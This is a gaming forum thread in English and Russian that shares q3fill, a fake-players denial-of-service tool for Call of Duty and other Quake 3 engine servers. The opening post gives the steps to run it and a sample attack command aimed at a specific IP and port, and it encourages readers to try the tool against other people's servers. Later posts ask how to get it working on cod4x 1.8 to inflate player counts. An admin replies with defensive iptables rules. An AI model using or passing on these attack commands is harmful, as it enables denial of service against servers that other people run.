Board index Call of Duty 1 Game Files & Downloads | Programs Quake 3 engine fake players DoS 0.4.4e \ Luigi Auriemma

Quake 3 engine fake players DoS 0.4.4e \ Luigi Auriemma


LaRocca Avatar
VIP
VIP

Posts: 25
Topics: 3
From http://aluigi.altervista.org/fakep.htm

#Start - Run - write cmd - enter
#Пуск - выполнить - написать по английски cmd - enter


#sample to path from C disk with unzip script
cd \myfiles\q3fill
# sample start attack with fake players   
q3fill.exe 81.198.134.150 28930
#Dont worry, our servers fixed, but try it make with another servers in cod1 and uo, cod2 or cod4!

How protect server: /viewtopic.php?f=35&t=67
You do not have the required permissions to view the files attached to this post.

Post #2 17.03.2016, 13:03
CuriousFox Avatar
Администратор
Администратор

Posts: 82
Topics: 8
Location: Riga, Latvija
типо open source?

Post #3 17.03.2016, 13:53
CuriousFox Avatar
Администратор
Администратор

Posts: 82
Topics: 8
Location: Riga, Latvija
На не-крякнутые сервера ничего не вызывает xD

Post #4 24.04.2017, 09:51

Posts: 0
LaRocca wrote:
From http://aluigi.altervista.org/fakep.htm

#Start - Run - write cmd - enter
#Пуск - выполнить - написать по английски cmd - enter


#sample to path from C disk with unzip script
cd \myfiles\q3fill
# sample start attack with fake players   
q3fill.exe 81.198.134.150 28930
#Dont worry, our servers fixed, but try it make with another servers in cod1 and uo, cod2 or cod4!

How protect server: /viewtopic.php?f=35&t=67

Its not working with cod4x 1.8 , its need hash keycode , how to fix

Hello,

Im searching long time to fix q3fill dos for call of duty 4 , so i saw it in your forum too

/viewtopic.php?f=24&t=83

But now its not working after the update of cod4x 1.8 , so please if you know how to fix or got other program to send some players to our server to attract players.

Thanks
Guanix

Posts: 0
Joined: Today, 09:10

Post #5 24.04.2017, 21:31
Admin Avatar
Администратор
Администратор

Posts: 215
Topics: 54
Location: Ненасытные пески будних дней.

Guanix wrote:
From http://aluigi.altervista.org/fakep.htm

#Start - Run - write cmd - enter
#Пуск - выполнить - написать по английски cmd - enter


#sample to path from C disk with unzip script
cd \myfiles\q3fill
# sample start attack with fake players   
q3fill.exe 81.198.134.150 28930
#Dont worry, our servers fixed, but try it make with another servers in cod1 and uo, cod2 or cod4!

How protect server: /viewtopic.php?f=35&t=67

Its not working with cod4x 1.8 , its need hash keycode , how to fix

For linux try add this lines for iptables.

#Kick fake connections
iptables -A INPUT -m string --algo bm --string "connect" -m recent --set --name CONNECT
iptables -A INPUT -m recent --update --seconds 1 --hitcount 2 --name CONNECT -j REJECT --reject-with icmp-port-unreachable

#q3msgboom exploit fix (28960 change to your server port)
iptables -A INPUT -p udp --dport 28960 -m length --length 600:0xFFFF -j DROP
Hе органическая среда активной пятницы oO

Post #6 25.04.2017, 06:15

Posts: 0
Guanix wrote:
LaRocca wrote:
From http://aluigi.altervista.org/fakep.htm

#Start - Run - write cmd - enter
#Пуск - выполнить - написать по английски cmd - enter


#sample to path from C disk with unzip script
cd \myfiles\q3fill
# sample start attack with fake players   
q3fill.exe 81.198.134.150 28930
#Dont worry, our servers fixed, but try it make with another servers in cod1 and uo, cod2 or cod4!

How protect server: /viewtopic.php?f=35&t=67

Its not working with cod4x 1.8 , its need hash keycode , how to fix

Hello,

Im searching long time to fix q3fill dos for call of duty 4 , so i saw it in your forum too

/viewtopic.php?f=24&t=83

But now its not working after the update of cod4x 1.8 , so please if you know how to fix or got other program to send some players to our server to attract players.

Thanks
Guanix

Posts: 0
Joined: Today, 09:10

Any ideas please need help

Post #7 25.04.2017, 16:21
Admin Avatar
Администратор
Администратор

Posts: 215
Topics: 54
Location: Ненасытные пески будних дней.

set scr_numbots 5
or make connections from another PC's
Hе органическая среда активной пятницы oO

Post #8 25.04.2017, 16:54

Posts: 0
Admin wrote:
set scr_numbots 5
or make connections from another PC's
This the fix ? And where to add it ?


Return to | Programs